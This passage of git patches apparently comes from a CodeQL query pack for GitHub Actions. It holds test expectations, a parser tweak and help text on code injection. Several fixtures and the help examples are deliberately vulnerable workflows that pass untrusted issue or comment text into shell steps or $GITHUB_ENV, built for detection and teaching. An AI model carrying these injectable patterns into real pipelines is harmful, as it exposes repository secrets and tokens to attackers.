.github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | @@ -928,6 +1158,38 @@ nodeLocations | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | @@ -1042,6 +1304,7 @@ nodeLocations | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -1221,8 +1484,6 @@ writeToGitHubEnv | VAR1 | $TITLE | VAR1<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | -| VAR4 | ${ISSUE_BODY1} | VAR4=${ISSUE_BODY1} | -| VAR5 | Hello\nWorld | VAR5< Date: Thu, 1 Aug 2024 17:49:13 +0200 Subject: [PATCH 445/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- .../Security/CWE-094/CodeInjectionCritical.md | 60 +++++++++++++++++++ .../Security/CWE-094/CodeInjectionMedium.md | 60 +++++++++++++++++++ ql/src/qlpack.yml | 2 +- 4 files changed, 122 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-094/CodeInjectionCritical.md create mode 100644 ql/src/Security/CWE-094/CodeInjectionMedium.md diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dff01f80f2b5..3a09bb016744 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.29 +version: 0.1.30 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md new file mode 100644 index 000000000000..9939c88eb19a --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md @@ -0,0 +1,60 @@ +# Code Injection in GitHub Actions + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendation + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Example + +The following example lets a user inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). +- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md new file mode 100644 index 000000000000..9939c88eb19a --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -0,0 +1,60 @@ +# Code Injection in GitHub Actions + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendation + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Example + +The following example lets a user inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). +- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1070a8e9a977..b89b197da04b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.29 +version: 0.1.30 groups: [actions, queries] suites: codeql-suites extractor: javascript From 41fade5feb30339cf8d453e7eb1cc0b1c7c57e7b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 12:44:43 +0200 Subject: [PATCH 446/707] feat(bash): Improve bash command parsing --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- ql/lib/codeql/actions/config/Config.qll | 2 +- .../.github/workflows/poisonable_steps.yml | 5 + .../library-tests/poisonable_steps.expected | 2 +- ql/test/library-tests/test.expected | 254 ++++++++++-------- .../.github/workflows/arg_injection.yml | 12 +- .../ArgumentInjectionCritical.expected | 8 + .../CWE-094/ArgumentInjectionMedium.expected | 5 + 8 files changed, 167 insertions(+), 123 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e05e3a8c41cb..5bb94ba8a68c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1243,7 +1243,7 @@ class RunImpl extends StepImpl { RunImpl() { this.getNode().lookup("run") = script } - string getScript() { result = script.getValue() } + string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index fb1ae9af14db..e298865c468f 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -92,7 +92,7 @@ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and // capture regexp - regexp = ".*" + commandPrefixDelimiter() + sub_regexp + commandSuffixDelimiter() + ".*" + regexp = ".*" + commandPrefixDelimiter() + sub_regexp // + commandSuffixDelimiter() + ".*" ) } diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index fad7001ad5a9..2e971baa050f 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -39,3 +39,8 @@ jobs: - run: echo "foo" | awk -f ./config.awk > foo.txt - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo - run: ./foo/cmd + - run: | + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index b164d16b6035..0cd71f96ea91 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -30,4 +30,4 @@ | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index dfdd843d8a3c..6bedcadcdbab 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -8,7 +8,7 @@ workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions @@ -16,14 +16,14 @@ jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -94,7 +94,8 @@ steps | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -167,7 +168,8 @@ runSteps | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -185,6 +187,7 @@ runExprs | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | @@ -287,7 +290,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -542,142 +546,147 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | 